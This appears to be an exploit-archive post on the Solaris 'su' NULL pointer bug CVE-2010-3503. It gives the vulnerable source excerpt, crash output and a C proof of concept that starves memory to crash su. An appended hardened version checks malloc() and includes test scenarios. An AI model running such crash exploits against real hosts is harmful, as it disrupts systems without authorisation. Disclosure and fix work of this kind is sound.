
[local exploits] - Oracle Solaris CVE-2010-3503 'su' Local Solaris Vulnerability

Posted on 13 October 2010

=============================================================
Oracle Solaris CVE-2010-3503 'su' Local Solaris Vulnerability
=============================================================

Excerpt from the Solaris 'su' source (line numbers are those of the vendor source file):

521     for (j = 0; initenv[j] != 0; j++) {                 [1]
522         if (initvar = getenv(initenv[j])) {             [2]
...
535         } else {
536             var = (char *)
537                 malloc(strlen(initenv[j])               [3]
538                 + strlen(initvar)
539                 + 2);
540             (void) strcpy(var, initenv[j]);             [4]

When 'su' builds the new environment from the inherited one, it carries over
values such as LC_ALL and TZ. The loop at [1] walks an array of variable names
to inherit; at [2], when it finds one that is set, it performs some checks (the
TZ= case is handled separately, so a variable such as LC_ALL takes the branch
shown) and then passes the name and value lengths into a malloc() at [3] whose
size is controlled by the caller's environment, WITH NO CHECKING OF THE RETURNED
VALUE. If malloc() fails it returns 0x0, and that NULL pointer is handed to
strcpy() at [4], introducing a NULL pointer dereference in 'su'.

Crash as seen in gdb and in the Solaris fault diagnostics:

Program terminated with signal 11, Segmentation fault.
#0  0xd1244734 in ?? ()
(gdb) x/i $pc
0xd1244734:     mov    %eax,(%edi)
(gdb) i r $eax
eax            0x415f434c       1096762188      <- OUR STRING
(gdb) i r $edi
edi            0x0      0                       <- NULL PTR

Incurred fault #6, FLTBOUNDS  %pc = 0xD1244734
  siginfo: SIGSEGV SEGV_MAPERR addr=0x00000000
Received signal #11, SIGSEGV [default]
  siginfo: SIGSEGV SEGV_MAPERR addr=0x00000000

----[ PoC: triggers the fault in 'su' as you.

/*
 * Sun Solaris <= 10 'su' NULL pointer exploit
 * ===========================================
 * because these are so 2009 now. I would exploit this but my name is not
 * spender or raptor. Sun do not check a call to malloc() when handling
 * environment variables in 'su' code. They also don't check passwords when
 * using telnet so who cares? You have to enter your local user pass to see
 * this bug. Enjoy!
 *
 * admin@sundevil:~/suid$ ./x
 * [ SunOS 5.11 'su' null ptr PoC
 * Password:
 * Segmentation Fault
 *
 * -- prdelka
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>        /* memset, memcpy (not included in the original listing) */
#include <unistd.h>        /* getlogin, execve (not included in the original listing) */
#include <sys/resource.h>
#include <sys/fcntl.h>
#include <sys/types.h>
#include <sys/mman.h>

int main(int argc, char *argv[])
{
    /* Read the current data-segment limit; the soft limit is lowered below so
     * that su's malloc() for the inherited LC_ALL variable fails. */
    struct rlimit *rlp = malloc(sizeof(struct rlimit));
    getrlimit(RLIMIT_DATA, rlp);

    /* One large variable: "LC_ALL=" followed by 'A's, NUL-terminated. */
    char *buf1 = malloc(300000);
    memset(buf1, 'A', 300000);
    buf1[299999] = '\0';
    memcpy(buf1, "LC_ALL=", 7);

    rlp->rlim_cur = 16400;
    setrlimit(RLIMIT_DATA, rlp);

    /* The original listing also placed an undeclared identifier 'file' in this
     * array; it is omitted here so the program compiles. */
    char *env[]  = { buf1, NULL };
    char *args[] = { "su", "-", getlogin(), NULL };
    printf("[ SunOS 5.11 'su' null ptr PoC\n");
    execve("/usr/bin/su", args, env);
    return 0;
}

// This was disclosed and patched in October 2010, CVE-2010-3503

# Inj3ct0r.com [2010-10-13]
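As an added example (not prdelka's PoC and not Sun's 'su' source), the same
inheritance loop written with the malloc() check the advisory says is missing:
a capped allocator stands in for the effect of a low RLIMIT_DATA, and the
failure path returns an error instead of reaching strcpy() with a NULL pointer.
initenv, limited_malloc, inherit_env and the two scenario functions are
constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Constructed for this example (not su's code): the names su inherits, and an
 * allocator cap that makes malloc() fail the way a tiny RLIMIT_DATA does. */
static const char *const initenv[] = { "LC_ALL", "TZ", "LANG", NULL };
static size_t fail_above_bytes = (size_t)-1;
static void *limited_malloc(size_t n) { return n > fail_above_bytes ? NULL : malloc(n); }

/* Hardened form of the su loop: the malloc() result is checked before anything
 * is written through it. Returns the number of "NAME=value" strings built, or
 * -1 on allocation failure after freeing what was built (out[0] is then NULL). */
int inherit_env(const char *const *names, char **out, size_t out_max) {
    size_t k = 0;
    for (size_t j = 0; names[j] != NULL && k < out_max; j++) {
        const char *val = getenv(names[j]);                  /* [2] in the su excerpt */
        if (val == NULL) continue;
        size_t need = strlen(names[j]) + strlen(val) + 2;    /* '=' and NUL */
        char *var = limited_malloc(need);                    /* [3] */
        if (var == NULL) {                         /* the check su lacked before [4] */
            while (k > 0) free(out[--k]);
            out[0] = NULL;
            return -1;
        }
        snprintf(var, need, "%s=%s", names[j], val);         /* replaces strcpy at [4] */
        out[k++] = var;
    }
    out[k] = NULL;
    return (int)k;
}
/* Constructed environment: LC_ALL and TZ set, LANG absent. */
static void prepare_env(void) {
    setenv("LC_ALL", "C", 1); setenv("TZ", "UTC", 1); unsetenv("LANG");
}
/* Scenario 1: memory available; expect 2 strings and a NULL terminator. */
int scenario_ok(void) {
    char *out[4]; prepare_env(); fail_above_bytes = (size_t)-1;
    int n = inherit_env(initenv, out, 3);
    int good = n == 2 && !strcmp(out[0], "LC_ALL=C") && !strcmp(out[1], "TZ=UTC") && !out[2];
    for (int i = 0; i < n; i++) free(out[i]);
    return good ? n : -99;
}
/* Scenario 2: the 9-byte request for "LC_ALL=C" fails; expect -1 and no write through NULL. */
int scenario_oom(void) {
    char *out[4]; prepare_env(); fail_above_bytes = 8;
    int n = inherit_env(initenv, out, 3);
    return (n == -1 && out[0] == NULL) ? -1 : -99;
}
```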
